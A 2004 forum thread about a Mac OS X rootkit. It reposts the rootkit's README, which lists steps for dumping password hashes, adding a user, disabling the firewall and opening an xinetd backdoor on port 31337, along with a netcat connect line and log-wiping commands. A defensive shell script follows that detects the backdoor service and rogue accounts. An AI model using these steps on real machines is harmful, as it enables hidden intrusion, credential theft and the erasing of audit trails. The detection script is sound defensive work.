MAC OS X H4XX0R trouble bubble bobble

http://www.theregister.co.uk/2004/10/25/mac_rootkit_opener/

TOMBOT, Tuesday, 26 October 2004 13:29 (twenty-one years ago)

It does take an administrator password to install it, though, and it doesn't auto-propagate.

Ed (dali), Tuesday, 26 October 2004 13:36 (twenty-one years ago)

Yeah, it's just a payload really. Privilege escalation is usually part of an exploit; this is a stepping stone. Still exciting and possibly fun; I am going to find a copy if I can and email it to myself.

TOMBOT, Tuesday, 26 October 2004 13:41 (twenty-one years ago)

###################################
# osxrk : OS X - Rootkit
#
# the burning man )'( - Public Release 0.2.1
# Sept. 2004
#
# by g@pple
#
# greets and thanks to Dim Bulb, Dr. Springfield, Jawn Doh!, B-r00t!,
# the fbsdrk & fbsdrootkit teams for inspiration.
#

This is the initial Public Release of the OS X RootKit. This type of rootkit should be easy to defend against if you really care about your computer. Keep your system up to date and patched.


- g@pple

"a rootkit is a collection of tools that is copied to the compromised system after root access already has been gained. Its purpose is after the fact, and it is designed to provide to the intruder the maximum benefit of the use of the compromised machine by maintaining the intruder's unauthorized access and allowing the intruder to act without being detected."
- A Limited Taxonomy of Traditional Rootkits by Amanda J. Rankhorn


install.sh script
-----------------

Install.sh does the following:

- outputs some user and system info.
- outputs the passwd hashes
- checks for opener already being installed
- looks for remote logging
- installs a new user
- turns on ssh
- turns off the firewall
- installs some tools (see below)
- installs Opener tool (see below)
- installs and starts the xinetd backdoor on 31337
- grabs a screenshot
- deletes install package

rootkit contents
----------------

backd - xinetd tcp backdoor on port 31337 by pWr & g@pple
(source code included) works on OS X 10.3.x
$ nc REMOTEHOSTIP 31337

nc - netcat 1.10 by Hobbit
(source code included)
NetCat is the shit, so many uses - read the source.

diepu - die putze log cleaner 0.6 by genius
(source code included, built for FreeBSD)

$ sudo ./pu -u LDAP-daemon #removes username LDAP-daemon from utmp
$ sudo ./pu -w LDAP-daemon #removes last entry from wtmp
$ sudo ./pu -l LDAP-daemon #removes username LDAP-daemon from lastlog entry

opener - unmodified version 2.38 by DimBulb & Jawn Doh!

Opener is a multi-purpose startup script to turn on services and gather user
info & hashes for Mac OS X.

- gathers system & user info, password hashes, serial numbers,
  adds new user, turns on services and much more.

- downloads and installs at startup:
  - osxphone for remote audio monitoring
  - dsniff for local network password sniffing
  - john the ripper to crack local machine hashes

TOMBOT, Tuesday, 26 October 2004 13:43 (twenty-one years ago)
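The install.sh steps quoted above leave host-side traces a defender can look for: an enabled xinetd service bound to an odd port (31337 for the posted backd), and an extra account such as the LDAP-daemon user the log-cleaner examples refer to. The script below is an added example, not from the thread or the rootkit package; the function names and sample files are constructed, and it assumes passwd-format input (from /etc/passwd, or `nidump passwd .` on the NetInfo-based OS X of that era).

```shell
#!/bin/sh
# Added example (not from the thread or the rootkit): host-side checks for two
# traces of the install.sh steps above. Function names and sample data are
# constructed for illustration.

# audit_xinetd_dir DIR PORT: print the name of each xinetd service file under
# DIR that is not disabled and binds PORT (the posted backdoor uses 31337).
audit_xinetd_dir() {
    dir=$1; port=$2
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # A service marked "disable = yes" is not listening; skip it.
        if grep -Eq '^[[:space:]]*disable[[:space:]]*=[[:space:]]*yes' "$f"; then
            continue
        fi
        if grep -Eq "^[[:space:]]*port[[:space:]]*=[[:space:]]*${port}([[:space:]]|\$)" "$f"; then
            sed -n 's/^[[:space:]]*service[[:space:]]*//p' "$f"
        fi
    done
    return 0
}

# audit_passwd FILE: read passwd-format lines (/etc/passwd, or "nidump passwd ."
# output on NetInfo-era OS X) and print accounts that have UID 0 without being
# root, or a daemon-style name with a real login shell (cf. LDAP-daemon above).
audit_passwd() {
    awk -F: '
        $3 == 0 && $1 != "root"                   { print $1 ": uid 0" }
        $1 ~ /daemon/ && $7 !~ /(false|nologin)$/ { print $1 ": daemon-named, shell " $7 }
    ' "$1"
}

# make_samples: build a constructed sample tree (xinetd entries + passwd) and print its path.
make_samples() {
    d=$(mktemp -d)
    printf 'service backd\n{\n\ttype = UNLISTED\n\tport = 31337\n\tserver = /usr/libexec/backd\n}\n' > "$d/backd"
    printf 'service old\n{\n\tdisable = yes\n\tport = 31337\n}\n' > "$d/old"
    printf 'service ssh\n{\n\tport = 22\n}\n' > "$d/ssh"
    printf 'root:*:0:0:Admin:/var/root:/bin/sh\n' > "$d/passwd"
    printf 'daemon:*:1:1:System Services:/var/root:/usr/bin/false\n' >> "$d/passwd"
    printf 'LDAP-daemon:*:0:0::/Users/LDAP-daemon:/bin/bash\n' >> "$d/passwd"
    echo "$d"
}

samples=$(make_samples)
echo "xinetd services bound to 31337:"; audit_xinetd_dir "$samples" 31337
echo "suspicious accounts:";            audit_passwd "$samples/passwd"
rm -rf "$samples"
```

On a real host point audit_xinetd_dir at /etc/xinetd.d and audit_passwd at the passwd dump; a disabled entry on the watched port is deliberately ignored so only live listeners are reported.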
